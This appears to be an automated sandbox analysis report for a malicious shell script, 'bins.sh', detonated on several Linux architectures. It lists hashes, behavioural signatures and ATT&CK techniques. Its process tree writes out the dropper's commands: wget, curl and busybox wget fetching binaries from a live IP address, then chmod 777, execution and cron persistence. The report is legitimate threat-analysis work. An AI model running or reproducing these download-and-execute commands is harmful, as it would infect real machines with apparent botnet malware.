Analysis
-
max time kernel
150s -
max time network
176s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
19/11/2024, 13:31
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
e7858e7f06486cd924155e463d230b74
-
SHA1
5e5be0e1760892742e4f707d8d072d6ed603e59e
-
SHA256
5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518
-
SHA512
648b5f3a77ecfc659307360e28d4d77a59363fffccb4f099a2c997c5ab4deab216b9aae273800ad6060e284935c0b77eb7dcecf3f32bc11f6a9e6a82182698ab
-
SSDEEP
192:+J7L7P7rQAYa4f+eINBHGHm7L7P7rQAs+eINB8l:+ZvzrQAYa4f+eINBHq6vzrQAs+eINBu
Malware Config
Signatures
-
Contacts a large (2091) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 694 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 695 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 -
Renames itself 1 IoCs
pid Process 696 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.VsbZTY crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/726/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/782/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/803/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/822/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/879/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/951/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/303/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/723/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/980/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/1002/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/899/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/920/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/1043/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/18/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/659/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/984/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/41/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/775/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/713/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/848/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/918/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/938/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/985/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/287/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/835/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/924/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/960/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/965/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/972/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/1004/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/715/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/750/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/783/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/993/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/1007/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/727/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/745/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/836/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/886/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/934/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/735/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/785/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/718/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/789/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/791/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/850/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/863/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/882/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/27/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/660/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/1000/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/319/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/709/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/738/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/925/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/28/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/141/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/900/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/710/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/719/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/764/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/779/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/858/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 File opened for reading /proc/962/cmdline 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 713 wget -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 wget File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 curl File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:662
-
/bin/rm/bin/rm bins.sh2⤵PID:665
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ22⤵
- Writes file to tmp directory
PID:670
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ22⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:690
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ22⤵
- Writes file to tmp directory
PID:693
-
-
/bin/chmodchmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ22⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ22⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:695 -
/bin/shsh -c "crontab -l"3⤵PID:697
-
/usr/bin/crontabcrontab -l4⤵PID:698
-
-
-
/bin/shsh -c "crontab -"3⤵PID:699
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:700
-
-
-
-
/bin/rmrm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ22⤵PID:709
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx52⤵
- System Network Configuration Discovery
PID:713
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
127KB
MD589077b7bd4bcafca7713be43635c4862
SHA1fc02edb8fba29ea8ee99e6157ef8560334530052
SHA25678416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
SHA5121b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
-
Filesize
210B
MD5416c1ba9a6bca553928f3c65957fea5a
SHA14f250de27d004cdac3a051eed6bb6b535e82afab
SHA256ea3d4febddba530442589bb21035e8a6f889f6e77455ad6228fb8b0cfbb39f73
SHA51208c88aaba617647bc4630615818c69e10f6711f3aacd336b43fdf66f875083513a56904b3cd7693c1d7d3415289ecdf05123b4736dc7ee178f89dd8cfa47cd82